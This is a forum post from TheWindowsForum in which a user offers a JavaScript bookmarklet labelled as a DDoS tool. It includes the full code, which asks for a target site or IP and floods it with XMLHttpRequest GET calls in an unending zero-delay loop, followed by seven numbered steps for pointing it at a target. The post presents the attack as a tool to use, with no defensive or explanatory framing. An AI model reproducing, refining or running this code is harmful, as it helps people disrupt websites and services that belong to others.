website stat Hacxx DDOS XMLHTTPREQUEST JS Bookmarklet | The Windows Forum
Install the app
How to install the app on iOS

Follow along with the video below to see how to install our site as a web app on your home screen.

Note: This feature may not be available in some browsers.

Welcome to TheWindowsForum

Since 2010 — Over 15 years of helping Windows users worldwide.

Join thousands of Windows enthusiasts & IT pros. Ask questions, share tips, download resources, and connect with the community — free and always friendly.

  • Post & reply in threads
  • Private message other members
  • Access exclusive guides & downloads
  • NO ADS for registered users

Hacxx DDOS XMLHTTPREQUEST JS Bookmarklet

hacxx

VIP
Joined
May 29, 2021
Messages
1,263
Code:
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();

View online:
 
How to:
1 - Open the browser
2 - Open the address to target
3 - Copy the address
4 - Start the bookmarklet
5 - Write the address
6 - Let the bookmarklet do the task
7 - To close the bookmarklet, close all browser windows
 

Support TheWindowsForum

Help us stay ad-free and keep the community running

Donate Now

Trending content

Back
Top